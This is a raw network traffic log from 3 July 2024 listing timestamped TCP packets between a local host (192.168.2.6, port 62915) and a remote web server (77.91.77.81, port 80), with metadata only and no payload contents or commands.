Jul 3, 2024 18:08:46.271177053 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271181107 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271188974 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271199942 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271207094 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271212101 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271220922 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271224022 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271234989 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271245956 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271248102 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271256924 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271272898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271274090 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271285057 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271285057 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271296024 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271306038 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271308899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271318913 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271321058 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271332026 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271342993 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271347046 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271353960 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271363020 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271389008 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271936893 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271948099 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271958113 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271967888 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271972895 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.271981001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.271991968 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272005081 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272011042 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272022009 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272028923 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272033930 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272042990 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272049904 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272063017 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272067070 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272077084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272088051 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272089958 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272099018 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272113085 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272113085 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272124052 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272135019 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272135973 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272156954 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272181034 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272653103 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272665024 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272675037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272686005 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272702932 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272708893 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272713900 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272727966 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272737026 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272739887 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272751093 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272754908 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272762060 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272768021 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272773027 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272783995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272794962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272799015 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272805929 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272818089 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272826910 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272830963 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272844076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272846937 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272855043 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272862911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272866011 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272885084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272888899 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272897005 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272907972 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272914886 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272919893 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.272931099 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.272954941 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.273652077 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.273663998 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.273674965 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.273686886 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.273688078 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.273696899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.273711920 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.273740053 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320651054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320754051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320794106 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320807934 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320835114 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320851088 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320866108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320867062 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320877075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320888996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.320894003 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320903063 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.320924997 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321037054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321048021 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321059942 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321069956 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321070910 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321084023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321094990 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321094990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321106911 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321114063 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321118116 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321129084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321134090 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321156025 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321177006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321293116 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321330070 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321366072 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321377039 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321388006 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.321400881 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.321415901 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356055975 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356093884 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356106997 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356177092 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356188059 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356193066 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356198072 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356210947 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356230021 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356276989 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356426954 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356437922 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356472015 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356503010 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356513023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356525898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356537104 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356548071 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356559038 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356560946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356571913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356581926 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356591940 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356631994 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356661081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356677055 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356687069 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356698036 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356700897 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356709003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356724024 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356734037 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.356734991 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.356767893 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357075930 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357088089 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357099056 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357111931 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357124090 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357130051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357134104 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357146025 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357156992 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357160091 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357184887 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357208967 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357392073 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357413054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357423067 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357434034 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357439995 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357445955 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357462883 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357470989 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357475042 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357485056 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357496023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357500076 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357525110 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357542038 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357549906 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357561111 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357572079 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357582092 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.357592106 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.357615948 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358520985 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358542919 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358553886 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358584881 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358632088 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358679056 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358691931 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358702898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358712912 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358725071 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358725071 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358761072 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358788967 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.358855009 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358865976 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.358903885 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359071016 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359081984 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359100103 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359112024 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359119892 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359122992 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359134912 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359147072 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359159946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359162092 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359194994 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359240055 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359251022 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359261990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359272957 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359282970 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359286070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359297037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359309912 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359333038 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359525919 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359538078 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359549046 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359560013 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359569073 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359571934 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359582901 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359595060 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359605074 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359605074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359617949 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359643936 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359662056 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359816074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359877110 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359925032 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359942913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359955072 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359966040 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359971046 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359978914 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.359986067 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.359989882 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360001087 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360012054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360032082 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.360050917 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.360227108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360239983 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360249996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360265017 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360270977 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.360276937 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360287905 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360300064 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.360311031 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.360342979 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411205053 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411232948 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411245108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411313057 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411324024 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411329985 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411336899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411381960 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411425114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411436081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411447048 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411465883 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411480904 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411624908 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411636114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411647081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411658049 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411658049 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411669016 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411678076 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411679983 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411686897 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411693096 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411694050 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411747932 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411853075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411865950 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411876917 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411889076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411890984 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411900043 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.411921978 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.411941051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447419882 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447444916 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447458982 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447495937 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447518110 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447599888 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447614908 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447664976 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447664976 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447698116 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447721004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447737932 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447757959 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.447778940 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447778940 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447778940 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447810888 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.447998047 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448009968 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448020935 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448033094 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448036909 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.448065996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448077917 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448086023 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.448086023 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.448090076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448101044 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.448102951 CEST	62915	80	192.168.2.6	77.91.77.81
